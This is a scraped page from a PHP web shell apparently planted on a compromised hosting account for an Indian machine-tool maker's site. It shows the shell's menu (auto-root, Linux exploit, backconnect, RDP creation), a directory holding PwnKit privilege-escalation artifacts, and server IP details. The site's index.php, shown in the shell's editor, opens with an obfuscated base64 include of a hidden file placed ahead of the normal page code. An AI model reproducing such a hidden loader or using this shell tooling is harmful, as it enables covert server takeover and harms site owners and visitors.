Linux linux7.web4world.com 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
: 199.38.113.107 | : 216.73.216.178
Cant Read [ /etc/named.conf ]
?5.6.40
siddhapu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
siddhapu /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
.pkexec
[ DIR ]
drwxr-xr-x
?;
.well-known
[ DIR ]
drwxr-xr-x
?;
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
?;
assets
[ DIR ]
drwxr-xr-x
?;
authentic_siddhapura_machine
[ DIR ]
drwxr-xr-x
?;
database_19_11_2020
[ DIR ]
drwxr-xr-x
?;
einvite
[ DIR ]
drwxr-xr-x
.htaccess
1.88
KB
-rw-r--r--
.mad-root
0
B
-rw-r--r--
.user.ini
583
B
-rw-r--r--
400.shtml
16.38
KB
-rw-r--r--
403.shtml
16.38
KB
-rw-r--r--
404.php
1.48
KB
-rw-r--r--
404.shtml
16.39
KB
-rw-r--r--
503.shtml
15.33
KB
-rw-r--r--
about.php
5.51
KB
-rw-r--r--
certification.php
987
B
-rw-r--r--
config.php
197
B
-rw-r--r--
contact.php
3.84
KB
-rw-r--r--
eventsandexhibition.php
1.14
KB
-rw-r--r--
exhibition.php
1.36
KB
-rw-r--r--
exhibition_category.php
1.19
KB
-rw-r--r--
footer.php
7.35
KB
-rw-r--r--
header.php
10.34
KB
-rw-r--r--
index.php
4.03
KB
-r--r--r--
mailcheck.php
0
B
-rw-r--r--
php.ini
577
B
-rw-r--r--
product.php
2.79
KB
-rw-r--r--
product_category.php
2.21
KB
-rw-r--r--
product_details.php
3.46
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
slider.php
1.23
KB
-rw-r--r--
ss.php
15.03
KB
-rw-r--r--
working_site_backup_19_11_2020...
89.41
MB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php $b = 'ba' . 'se64_decode'; @include $b('ZWludml0ZS9ib3JkZXIuY3dh'); include("header.php"); ?> <main> <!-- slider Area Start--> <?php include("slider.php"); ?> <!-- slider Area End--> <!-- contact with us Start --> <section class="contact-with-area" data-background="assets/img/gallery/section-bg2.jpg"> <div class="container"> <div class="row"> <div class="col-xl-11 col-lg-9 offset-xl-1 offset-lg-1"> <div class="contact-us-caption"> <div class="team-info pt-45"> <!-- Section Tittle --> <div class="section-tittle section-tittle4"> <div class="front-text"> <h2 class="">About us</h2> </div> </div> <p style="text-align: justify;text-justify: inter-word;"> It gives SIDDHAPURA MACHINES an immense pleasure to introduce ourselves as one of the leading Indian manufacturers of Machines Tools especially different types of Radial and Pillar Drilling Machines & Milling Machine in various capacities.</p> <a href="about.php" class="white-btn">Read More</a> </div> </div> </div> </div> </div> </section> <!-- contact with us End--> <!-- CountDown Area Start --> <div class="count-area"> <div class="container"> <div class="count-wrapper count-bg" data-background="assets/img/gallery/section-bg3.jpg"> <div class="row justify-content-center" > <div class="col-lg-4 col-md-4 col-sm-6"> <div class="count-clients"> <div class="single-counter"> <div class="count-number"> <?php $qu="SELECT * FROM `machinery` "; $result=mysqli_query($c,$qu); $mch = 0; while($row=mysqli_fetch_array($result)) { $mch++;} ?> <span class="counter"><?php echo $mch;?></span> </div> <div class="count-text"> <h5>Machinery <br>Tools</h5> </div> </div> </div> </div> <?php $qu="SELECT * FROM `machinery_dept` "; $result=mysqli_query($c,$qu); $dptdsp = 0; while($row=mysqli_fetch_array($result)) { $dptdsp++;} ?> <div class="col-lg-4 col-md-4 col-sm-6"> <div class="count-clients"> <div class="single-counter"> <div class="count-number"> <span class="counter"><?php echo $dptdsp;?></span> </div> <div class="count-text"> <h5>Machinery <br> Department</h5> </div> </div> </div> </div> </div> </div> </div> </div> <!-- CountDown Area End --> </main> <?php include("footer.php"); ?> </body> </html>
Close